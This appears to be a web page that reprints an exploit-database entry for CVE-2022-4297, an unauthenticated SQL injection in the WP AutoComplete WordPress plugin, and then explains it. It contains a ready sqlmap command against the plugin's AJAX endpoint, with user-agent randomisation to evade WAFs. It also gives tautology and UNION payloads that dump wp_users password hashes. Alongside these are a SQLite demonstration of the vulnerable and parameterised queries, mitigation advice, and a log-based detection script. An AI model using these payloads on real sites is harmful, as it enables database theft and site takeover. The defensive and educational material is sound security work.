WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux
---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape the q parameter before using it in a SQL statement via an AJAX action available to unauthenticated users,
leading to an unauthenticated SQL injection.
--------------------------------------
How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. The plugin reads the search term from the q parameter of its AJAX requests (action=wi_get_search_results)
3. Capture a search request sent by the plugin; it has the shape shown in step 5 (copy the security value from the captured request)
4. Start sqlmap against that request and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

WP AutoComplete 1.0.4 – Unauthenticated SQL Injection: A Deep Dive into a Critical WordPress Plugin Vulnerability
WordPress plugins extend site functionality, but poorly coded ones introduce security risks. One example is WP AutoComplete Search (wp-autosearch) 1.0.4, a plugin that adds autocomplete search to WordPress sites. The flaw is tracked as CVE-2022-4297 and the exploit above was published on 30 June 2023: an unauthenticated SQL injection through the plugin's AJAX endpoint, exploitable without any login credentials.
Understanding the Vulnerability
WP AutoComplete lets visitors search content (posts, pages, etc.) through an autocomplete box. The plugin fetches suggestions through the WordPress AJAX endpoint wp-admin/admin-ajax.php, registering a handler for the wi_get_search_results action; because the handler is registered for unauthenticated requests (the wp_ajax_nopriv_ hook), anyone who can reach the site can call it. The vulnerability lies in how the q parameter, the search term, is processed.
When a user types a search term, the plugin sends a request of the form:
https://example.com/wp-admin/admin-ajax.php?q=example&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]
Here q is the search query. The plugin does not sanitize or escape it before embedding it in a SQL statement, so an attacker controls part of the query that the database executes.
Why This is Dangerous
Unlike many vulnerabilities that require authentication, this flaw is unauthenticated: any visitor, including anonymous ones, can trigger it. The consequences include:
- Reading sensitive data: password hashes and emails from wp_users, private or draft posts, and anything else the database user can SELECT
- Running arbitrary read queries through UNION SELECT or, where the response hides results, blind boolean- and time-based extraction
- Modifying or deleting records is less likely here: the injection lands in a SELECT, and the WordPress $wpdb layer does not execute stacked queries, so writes would need a separate primitive
- Full disclosure of the database and, once an administrator's hash is cracked or reused elsewhere, full site takeover
Given that WordPress powers a large share of the web, this vulnerability is a real threat to small businesses, blogs, and enterprise sites alike, wherever the plugin is installed.
Exploitation Using sqlmap
Security researchers and penetration testers can use sqlmap to automate exploitation. The following command probes the vulnerability:
python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
This command tells sqlmap to:
- Target the specified URL (replace the placeholders with a real search term and the security value copied from a captured request)
- Send a randomly chosen browser User-Agent (--random-agent) instead of the default sqlmap one, which many WAFs block outright
- Use the full payload set (--level=5; higher levels also widen the set of tested parameters and headers, but -p q confines the test to q)
- Include the heavier tests of risk level 2 (--risk=2; the default is 1, and risk 3 adds OR-based tests that can alter rows when the injection lands in an UPDATE or DELETE)
- Test only the q parameter (-p q)
sqlmap will then attempt to confirm the injection, enumerate databases and tables (--dbs, --tables), and dump data (for example -T wp_users --dump).
Real-World Impact and Case Study
Consider a WordPress blog running WP AutoComplete 1.0.4. An attacker could send a search term such as the following (note the trailing space after --, which MySQL requires before it treats -- as a comment; URL-encode it as %20):
q=1' OR 1=1 -- 
If the plugin builds its query by splicing q into a LIKE clause, the statement becomes roughly (the plugin's exact query is not reproduced here):
SELECT * FROM wp_posts WHERE post_title LIKE '%1' OR 1=1 -- %'
The condition 1=1 is always true and everything after -- is ignored, so every row of wp_posts is returned regardless of any later status filter, including private and draft posts that the search would normally exclude.
More advanced attacks use UNION SELECT to read other tables; the injected SELECT has to return the same number of columns as the original query, which sqlmap works out automatically:
q=1' UNION SELECT user_login, user_pass FROM wp_users -- 
Such a query exposes the user table, and cracked or reused password hashes lead to credential theft and full site takeover.
Security Best Practices and Mitigation
Developers and administrators must prioritize secure coding practices. Here are essential recommendations:
- Use Prepared Statements: Never concatenate user input into SQL. In WordPress that means $wpdb->prepare() with %s/%d placeholders, and $wpdb->esc_like() on terms used inside LIKE patterns; escaping a quoted value with esc_sql() is the bare minimum, not the idiomatic fix.
- Input Validation: Validate and sanitize user input (type, length, allowed characters) before it reaches the database layer, as defence in depth rather than as the primary control.
- Limit AJAX Access: Register wp_ajax_nopriv_ handlers only for functionality that genuinely needs to be public. A search box does, so its handler must be safe for anonymous input; the nonce carried in the security parameter (the usual meaning of that field in WordPress AJAX requests) only proves the request came from a page that issued it, it is not authentication and does not stop an attacker who can load the page.
- Regular Plugin Updates: Keep plugins current, and check the plugin's changelog for a release that actually addresses CVE-2022-4297 before assuming a newer version is fixed; if no fixed release exists, deactivate and remove the plugin.
- Use a Web Application Firewall (WAF): ModSecurity with the OWASP Core Rule Set, or a hosted WAF such as Cloudflare's, blocks common SQL injection payloads, but it is a mitigation, not a fix.
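The script below is an added illustration, not part of the original advisory and not the plugin's own code. It reproduces both halves of the case study above (the tautology and the UNION payload) alongside the prepared-statement fix recommended in the list, using an in-memory SQLite stand-in for wp_posts and wp_users. The plugin's real query and schema are not on this page, so the table layout, the post_status filter and the placeholder password hash are assumptions; the search terms are the ones from the case study.

```python
import sqlite3

# Constructed stand-in for the wp_posts and wp_users tables (sample data, not a
# real site). The private post is what a public search must never return; the
# password hash is a placeholder string, not a real phpass hash.
POSTS = [
    (1, "Hello world", "publish"),
    (2, "About wordpress security", "publish"),
    (3, "Draft: Q3 revenue figures", "private"),
]
USERS = [("admin", "$P$BplaceholderHashValue")]


def make_db():
    """Create an in-memory SQLite database holding the two sample tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_status TEXT)")
    db.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", POSTS)
    db.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    db.executemany("INSERT INTO wp_users VALUES (?, ?)", USERS)
    return db


def vulnerable_search(db, q):
    """The bug class on the page: the search term is spliced into the SQL text.

    Anything in q that closes the quote is parsed as SQL, and a trailing
    comment (-- ) discards the rest of the statement, status filter included.
    """
    sql = (
        "SELECT ID, post_title FROM wp_posts "
        f"WHERE post_title LIKE '%{q}%' AND post_status = 'publish'"
    )
    return db.execute(sql).fetchall()


def safe_search(db, q):
    """Parameterised version: q is bound as data and never parsed as SQL.

    LIKE wildcards inside q are escaped so they match literally; in WordPress
    this is $wpdb->esc_like() followed by $wpdb->prepare().
    """
    escaped = q.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (
        "SELECT ID, post_title FROM wp_posts "
        "WHERE post_title LIKE ? ESCAPE '\\' AND post_status = 'publish'"
    )
    return db.execute(sql, (f"%{escaped}%",)).fetchall()


# Payloads from the case study. The space after -- matters for MySQL; SQLite
# accepts -- without it, so the same strings work against both. The UNION
# payload selects two columns because the original SELECT returns two.
TAUTOLOGY = "1' OR 1=1 -- "
UNION = "x' UNION SELECT user_login, user_pass FROM wp_users -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", vulnerable_search(db, TAUTOLOGY))  # every row, private included
    print("vulnerable, union:    ", vulnerable_search(db, UNION))      # the wp_users row
    print("safe, tautology:      ", safe_search(db, TAUTOLOGY))        # []
    print("safe, ordinary term:  ", safe_search(db, "world"))          # [(1, 'Hello world')]
```

In PHP terms the vulnerable function corresponds to $wpdb->get_results("... LIKE '%$q%'") and the safe one to $wpdb->prepare("... LIKE %s", '%' . $wpdb->esc_like($q) . '%'). The explicit ESCAPE clause is a SQLite detail; MySQL already treats the backslash as the default LIKE escape character. Note that the safe version also neutralises a bare % in the search term, which in the vulnerable version matches every published post.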
Vendor Response and Patch Status
The advisory reproduced above lists versions through 1.0.4 as affected and names no fixed release. Check the plugin's WordPress.org page (linked in the header) for a newer version whose changelog references the SQL injection, or for a notice that the plugin has been closed, and treat every version up to and including 1.0.4 as vulnerable. A real fix has to do at least the following:
- Build the search query with $wpdb->prepare(), passing the term through $wpdb->esc_like() before it is used in a LIKE pattern
- Validate the remaining parameters (Limit, timestamp) as integers
- Keep the unauthenticated (nopriv) AJAX handler only if anonymous search is a feature; it cannot be restricted to logged-in users without removing public search
Many sites will keep running the vulnerable version because nobody maintains them or nobody knows the plugin is installed. This underscores the need for automated vulnerability scanning and proactive security monitoring.
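Because the injection point is a fixed action name and parameter, it is straightforward to watch for in web-server logs. The following script is an added example, not part of the original advisory: it parses a handful of constructed Apache combined-format lines (sample data, including a sqlmap User-Agent in the format sqlmap emits), keeps only requests to admin-ajax.php with action=wi_get_search_results, and scores the decoded q value with weighted indicators so that a benign apostrophe (o'neil) stays below the alert threshold while a quote combined with a comment, a tautology or SLEEP() does not. The log format, path, weights and threshold are assumptions to adapt to your environment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (sample data, not from a real
# site). Lines 2 and 3 carry injection payloads in q, line 4 is an unrelated
# AJAX action and line 5 is a benign search containing an apostrophe.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jun/2023:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?q=wordpress&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=abcd1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Jun/2023:10:01:13 +0000] "GET /wp-admin/admin-ajax.php?q=1%27%20OR%201%3D1%20--%20&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=abcd1234 HTTP/1.1" 200 9845 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Jun/2023:10:01:14 +0000] "GET /wp-admin/admin-ajax.php?q=1%27%20AND%20SLEEP%285%29--%20&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=abcd1234 HTTP/1.1" 200 120 "-" "sqlmap/1.7.6#stable (https://sqlmap.org)"
198.51.100.7 - - [30/Jun/2023:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Jun/2023:10:02:05 +0000] "GET /wp-admin/admin-ajax.php?q=o%27neil&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=abcd1234 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

VULN_ACTION = "wi_get_search_results"
THRESHOLD = 3  # alert at or above this score (assumed value, tune to taste)

# Weighted indicators. A lone quote is cheap because real searches contain
# apostrophes; a quote next to a comment, tautology or timing function is not.
INDICATORS = [
    (re.compile(r"\bunion\b.*\bselect\b", re.I), 3, "union select"),
    (re.compile(r"\b(sleep|benchmark)\s*\(", re.I), 3, "time-based function"),
    (re.compile(r"\b(or|and)\b\s+\S+\s*=\s*\S+", re.I), 2, "boolean tautology"),
    (re.compile(r"--|#|/\*"), 2, "sql comment"),
    (re.compile(r"['\"]"), 1, "quote character"),
]


def score_query(q):
    """Return (score, reasons) for a percent-decoded q value."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(q):
            score += weight
            reasons.append(label)
    return score, reasons


def analyze_log(lines):
    """Return one finding per suspicious wi_get_search_results request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query)
        if params.get("action", [""])[0] != VULN_ACTION:
            continue
        q = params.get("q", [""])[0]  # parse_qs has already percent-decoded it
        score, reasons = score_query(q)
        if "sqlmap" in m["ua"].lower():
            score += 3
            reasons.append("sqlmap user-agent")
        if score >= THRESHOLD:
            findings.append({"ip": m["ip"], "time": m["ts"], "q": q,
                             "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} {f['time']} score={f['score']} q={f['q']!r} "
              f"reasons={', '.join(f['reasons'])}")
```

Scoring on the decoded value matters: the payloads arrive percent-encoded, and a rule that only inspects the raw request line misses %27 and %20. For a real deployment, feed the same function from the access log tail or a SIEM pipeline and add a per-IP rate check, since sqlmap at --level=5 sends hundreds of requests to the same endpoint in a short window.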
Conclusion
WP AutoComplete 1.0.4 serves as a textbook example of how a simple oversight in input handling can lead to severe security breaches. This unauthenticated SQL injection flaw highlights the critical importance of:
- Secure coding standards
- Regular software updates
- Proactive vulnerability detection
For any WordPress site, ensuring plugins are up-to-date and properly secured is not optional—it’s a necessity. The CVE-2022-4297 incident reminds us that even seemingly benign features like autocomplete can become gateways to full system compromise.